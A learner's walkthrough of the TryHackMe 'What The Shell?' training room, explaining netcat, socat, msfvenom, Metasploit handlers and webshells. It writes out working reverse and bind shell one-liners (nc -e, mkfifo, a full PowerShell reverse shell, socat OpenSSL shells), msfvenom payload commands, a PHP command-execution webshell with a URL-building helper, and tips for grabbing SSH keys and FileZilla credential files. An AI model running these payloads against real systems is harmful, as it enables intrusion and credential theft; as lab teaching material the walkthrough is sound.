TryHackMe - What The Shell? Walkthrough

What The Shell?

Here we go, on with another room in the Complete Beginner learning path!

netcat, socat, metasploit I have used before – some of them even documented in posts!

msfvenom is new though, so that’s exciting.

With regard to the links here:

  • PayloadsAllTheThings and PenTest Monkey are both fantastic, I have dipped my toe into those before
  • knowing where webshells are stored locally is useful too, make a note of /usr/share/webshells
  • the SecLists repo is great as well; clone it into its own directory alongside your other wordlists (on Kali the package lands in /usr/share/seclists)

Task 3 – Types of Shell

The most important thing to understand here is that a reverse shell has the listener on your system (the target connects back to you), and a bind shell has the listener on the target (you connect to it)

I personally haven’t done much in the way of bind, but reverse shells are very common thus far on THM/HTB

With regard to the questions:

  • a reverse shell has the listening port on your computer, so ‘r’
  • most webshells are non-interactive (so ‘n’): you commonly put a command into the browser URL bar or something similar, and it just returns the output
  • a bind shell, as described, has the listener on the target machine (i.e. not yours), so ‘t’

Task 4 – Netcat

netcat is something to get used to, so take some proper time to explore this page and make sure you understand it fully

again, a reverse shell has the listener on your computer

  • setting that up with netcat is easy, it’s simply ‘nc -lvnp 1234’ (-l listen, -v verbose, -n skip DNS lookups, -p the port to listen on)
  • you can choose whatever port you like, I just use 1234 or 443 as they’re common and easy to remember
  • so, the listening option is ‘-l’
  • as we stated above, connecting to a bind shell simply requires the target IP and its listening port
  • so connecting to that IP would simply be ‘nc 10.10.10.11 8080’

Task 5 – Shell Stabilisation

Right, ace, we’ve done this before so let’s give this a quick look over

Python I’m familiar with (in this context, not the language at large – that’s down the list of things to learn)

  • key points are the commands ‘python -c 'import pty;pty.spawn("/bin/bash")'’ to spawn a better shell (check which version of python the target has first: python, python2 or python3); ‘export TERM=xterm’ to give us access to more commands such as clear; then Ctrl+Z to background the shell and, back in our own terminal, ‘stty raw -echo; fg’ which turns off our terminal echo and foregrounds the shell (that’s the fg bit)
  • rlwrap I’ve never used and apparently gives a better base shell, so I’ll look forward to messing about with that in the future
  • key points here are the commands ‘sudo apt install rlwrap’ (because obviously); ‘rlwrap nc -lvnp <port>’ to set up the rlwrap listener; and then the same Ctrl+Z followed by ‘stty raw -echo; fg’ as before
  • socat is the next step up from netcat, but it has to exist on the target, so in practice you use an already-active netcat shell to upload a static socat binary
  • key points: on your machine set up a webserver with ‘sudo python3 -m http.server 80’ and on the target use your nc shell to download the binary with ‘wget <local-IP>/socat -O /tmp/socat’ (that’s a capital O for the output file; remember to chmod +x it afterwards)
  • finally we can look at changing the terminal tty size (not something I’ve done, but have learned this before)
  • key points: find out and note down your current tty rows & columns with ‘stty -a’ in your own terminal; then in the reverse/bind shell run ‘stty rows <number>’ and ‘stty cols <number>’
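A small helper for that last step, added here as an example (it is not part of the room or the original post): it pulls the rows and columns out of GNU ‘stty -a’ output and prints the two stty commands ready to paste into the reverse shell, so you are not eyeballing numbers out of a wall of terminal settings. The sample stty output below is constructed (assumed to be a 200x50 terminal), and the parser assumes the Linux/GNU format ‘rows N; columns M;’.

```shell
#!/bin/sh
# Added example, not from the THM room: turn your local terminal geometry into
# the commands to run inside the (already stabilised) reverse shell.

# Extract "rows N; columns M;" from GNU stty -a output passed as $1 and print
# the matching stty command for the remote side. Prints nothing and returns 1
# if no geometry is found (e.g. stty -a was run without a controlling tty).
tty_resize_cmds() {
    tty_out=$(printf '%s\n' "$1" | sed -n \
        's/.*rows \([0-9][0-9]*\);.*columns \([0-9][0-9]*\);.*/stty rows \1 cols \2/p' \
        | head -n 1)
    [ -n "$tty_out" ] || return 1
    printf '%s\n' "$tty_out"
}

# Constructed sample of what `stty -a` prints on a 200x50 terminal on Linux
# (only the first line carries the geometry).
SAMPLE_STTY='speed 38400 baud; rows 50; columns 200; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;'

# Demo on the constructed sample; prints: stty rows 50 cols 200
tty_resize_cmds "$SAMPLE_STTY"
```

In your own terminal on the attack box run ‘tty_resize_cmds "$(stty -a)"’ and paste the result into the stabilised shell. If you only need the numbers, GNU ‘stty size’ prints just ‘rows cols’ on one line.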

Task 6 – socat

Right, so this is more in-depth as the syntax is a bit whacky, so here are some cliff notes:

  • a listener for a reverse shell is set up with ‘socat TCP-L:<port> -’ (that’s the answer to the Q at the bottom btw: TCP-L:8080); this is the equivalent of nc -lvnp
  • connect back with ‘socat TCP:<localIP>:<localport> EXEC:"bash -li"’
  • for a bind shell, on the target run ‘socat TCP-L:<port> EXEC:"bash -li"’ (remember, it’s backwards from a reverse shell)
  • connect from our machine with ‘socat TCP:<targetIP>:<targetport> -’ (the trailing ‘-’ means "use this terminal" for input and output)
  • the key benefit of socat is a fully stable Linux tty reverse shell, so a different listener is used for this: ‘socat TCP-L:<port> FILE:`tty`,raw,echo=0’ (the equivalent of CTRL+Z and then ‘stty raw -echo; fg’ as we’ve seen before)
  • the special listener is super powerful but requires your target to already have socat installed, which isn’t always the case (though you can do it with the static binaries in the link provided); the matching connect-back command is ‘socat TCP:<yourIP>:<yourport> EXEC:"bash -li",pty,stderr,sigint,setsid,sane’

Boy, that’s a lot!

Task 7 – socat Encrypted Shells

Okay, lots here so I won’t spend time re-writing what already is written, let’s just break down how to get the answers!

We’re asked to set up an openssl listener using the previous tty technique

  • first off, we’re asked for a listener on port 53, so ‘socat OPENSSL-LISTEN:53’
  • then we need to use the .pem file provided: ‘cert=encrypt.pem,verify=0’ (verify=0 skips certificate validation, which we need because the cert is self-signed)
  • and finally the tty we looked at previously, ‘FILE:`tty`,raw,echo=0’ (note it’s FILE, not EXEC, on the listener side)
  • answer should be ‘socat OPENSSL-LISTEN:53,cert=encrypt.pem,verify=0 FILE:`tty`,raw,echo=0’
  • then we’re asked for the syntax for connecting back to a listener
  • we know connect back begins with ‘socat OPENSSL:<localIP>:<localport>’; our IP and port are given so it’s ‘socat OPENSSL:10.10.10.5:53’
  • we also know we have to add ‘verify=0’ prior to our EXEC
  • we’re also given the EXEC target and its parameters (it’s in the hint)
  • so, it should be ‘socat OPENSSL:10.10.10.5:53,verify=0 EXEC:"bash -li",pty,stderr,sigint,setsid,sane’

Task 8 – Common Shell Payloads

Once again in this task we’re pointed toward PayloadsAllTheThings, so go and check it out

This is just a page of payload commands, so not worth me going through in detail. Highlights include:

  • using netcat as a bind shell: ‘nc -lvnp <port> -e /bin/bash’
  • reverse shell: ‘nc <localIP> <port> -e /bin/bash’ (both need a netcat built with -e support, which most distro versions aren’t, hence the next two)
  • creating a listener for a bind shell without -e: ‘mkfifo /tmp/f; nc -lvnp <port> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f’
    ◇ ‘mkfifo’ is the answer to the question below, by the way: it creates a named pipe at /tmp/f, then nc reads its input from that pipe and sends it out over the socket, whatever arrives on the socket is piped into /bin/sh, and /bin/sh writes its output (and errors) back into the pipe, closing the loop
  • and the reverse shell version: ‘mkfifo /tmp/f; nc <localIP> <port> < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f’
  • absolute craziness for a Powershell reverse shell: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Phew

Task 9 – msfvenom

Woo hoo! A new tool!

Let’s review some of the key commands, as we’ll need them for our answer later:

  • standard syntax is ‘msfvenom -p <payload> <options>’ and the example given is ‘msfvenom -p windows/x64/shell/reverse_tcp -f exe -o shell.exe LHOST=<listen-IP> LPORT=<listen-port>’
  • incidentally, we’re told here that staged payloads use a ‘/’ between stager and stage (shell/reverse_tcp) whereas stageless payloads use an ‘_’ (shell_reverse_tcp), so ‘_’ is the answer to Q2
  • the basic way of naming a payload follows ‘<OS>/<arch>/<payload>’, so for example ‘linux/x86/shell_reverse_tcp’ or ‘linux/x64/meterpreter/reverse_tcp’
  • this has given us all the info we need to complete the final question, by the way: pull it together given we know the IP and port, format = elf and output = shell
  • final answer (Q3): ‘msfvenom -p linux/x64/meterpreter/reverse_tcp -f elf -o shell LHOST=10.10.10.5 LPORT=443’

Task 10 – metasploit multi/handler

Cool, familiar ground – we covered this in our metasploit and blue modules! Go back and read those if you haven’t already

Top commands:

  • ‘msfconsole’ to open metasploit, though I like to use the -q switch to reduce the clutter
  • ‘use multi/handler’ to get cracking
  • ‘show options’ to see what needs setting, then ‘set payload’, ‘set lhost’ and ‘set lport’, as all are required for your listener (the payload must be the same one you gave msfvenom; staged and meterpreter payloads need this handler, a plain nc listener won’t do)
  • lhost will be your tun0 IP if on openvpn, lport the port of your choosing
  • ‘exploit -j’, with the -j being the option to run as a job in the background
  • ‘sessions <#>’ to foreground a session
  • # being the number of the session you want to fg; if you aren’t sure, you can use ‘sessions’ to show what’s active
  • all this gives you the answers to the questions:
  • ‘exploit -j’
  • ‘sessions 10’

Task 11 – WebShells

Great, we’ve done this before too! I think this was in the PickleRick CTF I did, so check that out (note in post-edit: I haven’t released the PickleRick CTF walkthrough yet)

Webshells are quite basic at this level, so here’s some top tips:

  • easily create a webshell script by using ‘nano webshell.php’ and copying in this script: <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?> then hit ctrl+x, y, enter
  • alternatively, check out PentestMonkey as suggested in the text, though that specific link gives a reverse shell and you will need to edit it with your IP and listening port etc
  • upload this somewhere on the webserver you’re attacking that will let you do so (and that actually executes .php rather than serving it as text)
  • navigate to the webshell in your browser (in THM this usually takes the form of ‘http://<targetIP>/uploads/webshell.php’)
  • you use the parameter ‘?cmd=’ to input your commands, so if you had found a flag you could do ‘http://<targetIP>/uploads/webshell.php?cmd=cat flag.txt’ to read it (the browser encodes the space for you, but anything containing ‘&’, ‘;’ or ‘#’ has to be URL-encoded by hand or the webserver will cut the command short)
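The URL-encoding point bites as soon as you chain commands, so here is a helper for building the webshell URL from the terminal, added as an example (not from the room or the original post). The target address, upload path and commands are constructed for the demo; the encoder passes RFC 3986 unreserved characters through and turns everything else into %XX, byte by byte.

```shell
#!/bin/sh
# Added example, not from the THM room: build the ?cmd= URL for the PHP webshell
# above with the command percent-encoded. A raw "?cmd=cat flag.txt; id" in the
# URL bar survives only because the browser encodes the space; '&' starts a new
# parameter and '#' starts a fragment, so shell_exec() never sees the full command.

LC_ALL=C; export LC_ALL   # byte-wise string handling for the encoder

# Percent-encode $1 as a query-string value: A-Z a-z 0-9 . _ ~ - pass through,
# every other byte becomes %XX.
urlencode() {
    enc_in="$1"
    enc_out=""
    while [ -n "$enc_in" ]; do
        enc_c=${enc_in%"${enc_in#?}"}   # first byte
        enc_in=${enc_in#?}              # the rest
        case $enc_c in
            [A-Za-z0-9._~-]) enc_out="$enc_out$enc_c" ;;
            *) enc_out="$enc_out$(printf '%%%02X' "'$enc_c")" ;;
        esac
    done
    printf '%s\n' "$enc_out"
}

# $1 = URL of the uploaded webshell, $2 = shell command to run through ?cmd=
webshell_url() {
    printf '%s?cmd=%s\n' "$1" "$(urlencode "$2")"
}

# Constructed target and path (assumptions for the demo, not from the room).
WEBSHELL="http://10.10.10.10/uploads/webshell.php"
webshell_url "$WEBSHELL" "cat flag.txt"
webshell_url "$WEBSHELL" "ls -la /var/www/html; id"
# Fetch from the terminal instead of the browser and drop the <pre> wrapper:
# curl -s "$(webshell_url "$WEBSHELL" 'id')" | sed 's#</\{0,1\}pre>##g'
```

Once the command is encoded, pipes, redirects and ‘;’ all reach shell_exec() intact, which is also exactly why this webshell is a one-liner to full command execution for anyone who finds the upload.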

Task 12 – Next Steps

I think most of this could be summarised with:

  • shells are unstable
  • escalate out of that shell quickly
  • SSH is a good way of doing this, so find where the SSH keys are stored
  • Linux: /home/<user>/.ssh
  • Windows is more complicated and often has no SSH server, so look for stored credentials instead, e.g. the FileZilla Server config at C:\Program Files\FileZilla Server\FileZilla Server.xml or C:\xampp\FileZilla Server\FileZilla Server.xml, which holds FTP user credentials
  • just get into the system in another way quickly

Task 13 – Practice & Examples

If you want the walkthrough for the practicals, you can continue reading here...

More articles by Edward Grovenor
